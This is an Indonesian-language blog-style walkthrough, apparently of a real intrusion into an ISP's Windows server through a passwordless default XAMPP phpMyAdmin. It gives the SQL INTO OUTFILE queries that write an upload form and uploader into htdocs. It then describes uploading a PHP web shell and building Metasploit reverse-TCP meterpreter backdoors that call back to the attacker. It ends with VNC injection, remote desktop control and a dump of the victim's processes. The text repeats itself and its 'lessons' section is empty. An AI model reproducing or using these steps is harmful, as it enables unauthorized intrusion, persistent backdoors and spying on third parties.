phpmyadmin adalah aplikasi yang di gunakan dalam pengoperasian mysql melalui web environment. Karena memang pengoperasian mysql dari command line masih tergolong sulit. Ok coba ane bahas kronologis akibat dari hal ini.
1. Target yang memiliki kelemahan dalam aplikasi phpmyadmin
Begitu saya membuka url target .. hupfftt ternyata phpmyadminnya terbuka… ya saya lanjutkan dengan mengexploitasi…kenapa langsung terbuka? karena secara default phpmyadmin terinstall tanpa menggunakan password .. username:root password:no biasanya hal ini terjadi ketika windows user menginstall xampp secara default.
Kemudian saya coba buat database baru dengan nama tes.. kemungkinan nalar saya mengatakan bahwa sang admin gk akan curiga dengan database bernama tes.. karena saya sendiri sering membuat database dengan nama seperti itu untuk melakukan testing database pada phpmyadmin
2. Mengetahui dengan pasti aplikasi webserver yang di gunakan target. ( INFORMATION GATHERING )
Aplikasi webserver kan bermacam-macam .. sesuai dengan operatingsystem yang dipakai.. sebut saja apache, nginx yang biasanya ada pada sistem linux dan xampp yang berada pada sistem windows.. untuk mengetahui dengan pasti aplikasi yang di pakai biasanya attacker akan mencari tau aplikasi yang dipakai. Pada kasus ini saya tinggal membuka halaman index dan terlihat xampp secara default
Hmm terlihat jelas sekali bahwa sistem operasi yang di pakai ada windows dan aplikasi web server yang dipakai adalah xampp. Pada kasus yang berbeda nntinya anda tinggal akan mengganti lokasi-lokasi dir default dari berbagai aplikasi web server.
3. Mengesekusi query untuk membuat file upload
Nah seperti yang kita tau , mysql memiliki beberapa perintah-perintah dalam bentuk query atau sql syntax, nah dengan memanfaatkan kesempatan tersebut, attacker akan membuat sebuah perintah-perintah query dengan tujuan tertentu
caranya ?
Saya masuk ke database “test” yang baru saja saya buat kemudian saya buka sql dan memasukan query-query di bawah ini
Kita ulangi kembali langkah tadi kemudian masukan query di bawah ini untuk membuat file upload.php
4. Upload file backdoor ( EXPLOITATION )
Kemudian attacker tinggal membuka file form.php untuk mengupload file berikutnya… karena di upload pada direktori utama pada xampp di dir “htdocs” maka attacker tinggal membuka url http://situstarget/form.php
yup dari sini sudah di buka form upload di mana anda dapat melakukan langkah selanjutnya. Ane mencoba mengupload file backdoor.php modipan om james0baster yang dikenal dengan nama 404.php…ternyata berhasil.
yup sejauh ini anda sudah menjadi “admin” karena dilihat dari informasi yang di hasilkan 404.php anda berprivilage admin.. mengingat memang windows menginstall xamp lewat privilage admin
Apakah attacker akan berhenti sampai disini ? tentu saja tidak .. attacker akan berusaha untuk mendapatkan akses lebih dalam lagi .. dalam hal ini sangat dimungkinkan mesin disusupi remote backdoor.
5. REMOTE BACKDOOR ( MAINTAINING ACCESS )
Ok seperti yang saya bilang attacker tidak akan puas sebelum anda benar2 terOWNED !!! karena itu saya coba buat backdoor dengan menggunakan fasilitas payload
hehehe backdoor bernama “susan” sudah siap digunakan. Backdoor tersebut kemudian saya upload lewat shell 404.php tadi ..
Tinggal saya jalankan metasploit listernernya di backtrack saya
Kemudian attacker akan mengesekusi file remote backdoor melalui shell. Dalam kasus ini saya mencoba esekusi file susan,exe melalui backdoor 404.php
Dan meterpreterpun terbuka.. sebenarnya ini termasuk dari tehnik penyerangan melalui NAT yang sering ditanya2 di forum.. hanya dengan ip publik vs ip publik kita bisa melakukan hal ini.
jiahh kita lihat proses berjalan pada server target …
Dilihat dari prosesnya ada 2 antivirus sedang berjalan .. hmmm
Adanya proses yahoo messangger membuat saya penasaran .. siapa tau bisa liat2 percakapn gitu hahaha.. akhirnya saya melakukan migrating ke proses explorer.exe yaitu pada pid 1308 kemudian melakukan vnc backdoor injection
dan remote-desktop melalui vnc stagger pun terbuka …dan saya bahkan dapat mengontrol / meremote desktop server target dari jauh !!
Ternyata server yang kita pentest barusan itu adalah server ISP ( internet service provide ) yang membagi-bagi bandwidth .. semoga admin dari perusahaan tersebut melihat postingan ini kemudian memperbaiki celah tersebut…:P
Langkah terakhir saya mencoba memasuki cmd shell dari server tersebut ..
Ok server ini ter-owned sepenuhnya …
Pelajaran yang harus kita tarik bersama dari postingan ini
1. Target yang memiliki kelemahan dalam aplikasi phpmyadmin
Begitu saya membuka url target .. hupfftt ternyata phpmyadminnya terbuka… ya saya lanjutkan dengan mengexploitasi…kenapa langsung terbuka? karena secara default phpmyadmin terinstall tanpa menggunakan password .. username:root password:no biasanya hal ini terjadi ketika windows user menginstall xampp secara default.
Kemudian saya coba buat database baru dengan nama tes.. kemungkinan nalar saya mengatakan bahwa sang admin gk akan curiga dengan database bernama tes.. karena saya sendiri sering membuat database dengan nama seperti itu untuk melakukan testing database pada phpmyadmin
2. Mengetahui dengan pasti aplikasi webserver yang di gunakan target. ( INFORMATION GATHERING )
Aplikasi webserver kan bermacam-macam .. sesuai dengan operatingsystem yang dipakai.. sebut saja apache, nginx yang biasanya ada pada sistem linux dan xampp yang berada pada sistem windows.. untuk mengetahui dengan pasti aplikasi yang di pakai biasanya attacker akan mencari tau aplikasi yang dipakai. Pada kasus ini saya tinggal membuka halaman index dan terlihat xampp secara default
Hmm terlihat jelas sekali bahwa sistem operasi yang di pakai ada windows dan aplikasi web server yang dipakai adalah xampp. Pada kasus yang berbeda nntinya anda tinggal akan mengganti lokasi-lokasi dir default dari berbagai aplikasi web server.
3. Mengesekusi query untuk membuat file upload
Nah seperti yang kita tau , mysql memiliki beberapa perintah-perintah dalam bentuk query atau sql syntax, nah dengan memanfaatkan kesempatan tersebut, attacker akan membuat sebuah perintah-perintah query dengan tujuan tertentu
caranya ?
Saya masuk ke database “test” yang baru saja saya buat kemudian saya buka sql dan memasukan query-query di bawah ini
use mysql;Perintah di atas sebenarnya bertujuan untuk membuat file bernama form.php yang nntinya digunakan attacker untuk meupload file backdoor. Perhatikan sytax html pada form dengan action=”upload.php” yup tebakan anda benar … kita harus membuat file upload.phpnya yang menjadi esekutor.
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('
Upload file :');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/form.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;
Kita ulangi kembali langkah tadi kemudian masukan query di bawah ini untuk membuat file upload.phpuse mysql;Tinggal neken tombol “GO” nah sebenarnya dilihat dari perintah maka kita akan membuat file tersebut didalam direktori web default xampp yaitu “c:/xampp/htdocs/” dan dengan kedua query tadi attacker telah membuat 2 file dalam dir c:/xampp/htdocs/ yaitu “form.php” dan “upload.php”
DROP TABLE IF EXISTS `temptab`;
CREATE TABLE temptab (codetab text);
INSERT INTO temptab (codetab) values ('<?php $uploaddir = "C:/xampp/htdocs/";$uploadfile = $uploaddir . basename($_FILES["userfile"]["name"]);echo "
";if (move_uploaded_file($_FILES["userfile"]["tmp_name"], $uploadfile))print "
";?>');
SELECT * INTO OUTFILE 'C:/xampp/htdocs/upload.php' from temptab;
DROP TABLE temptab;
FLUSH LOGS;
4. Upload file backdoor ( EXPLOITATION )
Kemudian attacker tinggal membuka file form.php untuk mengupload file berikutnya… karena di upload pada direktori utama pada xampp di dir “htdocs” maka attacker tinggal membuka url http://situstarget/form.php
yup dari sini sudah di buka form upload di mana anda dapat melakukan langkah selanjutnya. Ane mencoba mengupload file backdoor.php modipan om james0baster yang dikenal dengan nama 404.php…ternyata berhasil.
yup sejauh ini anda sudah menjadi “admin” karena dilihat dari informasi yang di hasilkan 404.php anda berprivilage admin.. mengingat memang windows menginstall xamp lewat privilage admin
Apakah attacker akan berhenti sampai disini ? tentu saja tidak .. attacker akan berusaha untuk mendapatkan akses lebih dalam lagi .. dalam hal ini sangat dimungkinkan mesin disusupi remote backdoor.
5. REMOTE BACKDOOR ( MAINTAINING ACCESS )
Ok seperti yang saya bilang attacker tidak akan puas sebelum anda benar2 terOWNED !!! karena itu saya coba buat backdoor dengan menggunakan fasilitas payload
root@eichel:~# msfpayload windows/shell/reverse_tcp LHOST=1xx.xxx.xxx.xxx x > /tmp/zee.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/shell/reverse_tcp
Length: 290
Options: {"LHOST"=>"1xx.xxx.xxx.xxx"}
root@eichel:~# msfpayload windows/meterpreter/reverse_tcp LHOST=1xx.xxx.xxx.xxx x > /tmp/susan.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"1xx.xxx.xxx.xxx"}
hehehe backdoor bernama “susan” sudah siap digunakan. Backdoor tersebut kemudian saya upload lewat shell 404.php tadi ..
Tinggal saya jalankan metasploit listernernya di backtrack saya
Kemudian attacker akan mengesekusi file remote backdoor melalui shell. Dalam kasus ini saya mencoba esekusi file susan,exe melalui backdoor 404.php
Dan meterpreterpun terbuka.. sebenarnya ini termasuk dari tehnik penyerangan melalui NAT yang sering ditanya2 di forum.. hanya dengan ip publik vs ip publik kita bisa melakukan hal ini.
jiahh kita lihat proses berjalan pada server target …
Dilihat dari prosesnya ada 2 antivirus sedang berjalan .. hmmm
1280 DefWatch.exe x86 0 C:\Program Files\Symantec AntiVirus\DefWatch.exeTernyata antivirusnya kyknya gk diupdate atau bajakan ?.. hanya ALLAH yang tau !
1308 explorer.exe x86 0 ADMIN\Admin C:\WINDOWS\Explorer.EXE
1316 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1336 snmp.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\snmp.exe
1340 hkcmd.exe x86 0 ADMIN\Admin C:\WINDOWS\system32\hkcmd.exe
1364 postgres.exe x86 0 C:\Program Files\PostgreSQL\9.0\bin\postgres.exe
1400 YahooAUService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Yahoo!\SoftwareUpdate\YahooAUService.exe
1520 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1552 pds.exe x86 0 C:\WINDOWS\system32\CBA\pds.exe
1584 svchost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
1672 svchost.exe x86 0 C:\WINDOWS\system32\svchost.exe
1684 igfxpers.exe x86 0 ADMIN\Admin C:\WINDOWS\system32\igfxpers.exe
1708 SM?RTP.exe x86 0 ADMIN\Admin C:\Program Files\Smadav\SM?RTP.exe
Adanya proses yahoo messangger membuat saya penasaran .. siapa tau bisa liat2 percakapn gitu hahaha.. akhirnya saya melakukan migrating ke proses explorer.exe yaitu pada pid 1308 kemudian melakukan vnc backdoor injection
dan remote-desktop melalui vnc stagger pun terbuka …dan saya bahkan dapat mengontrol / meremote desktop server target dari jauh !!
Ternyata server yang kita pentest barusan itu adalah server ISP ( internet service provide ) yang membagi-bagi bandwidth .. semoga admin dari perusahaan tersebut melihat postingan ini kemudian memperbaiki celah tersebut…:P
Langkah terakhir saya mencoba memasuki cmd shell dari server tersebut ..
Ok server ini ter-owned sepenuhnya …
Pelajaran yang harus kita tarik bersama dari postingan ini
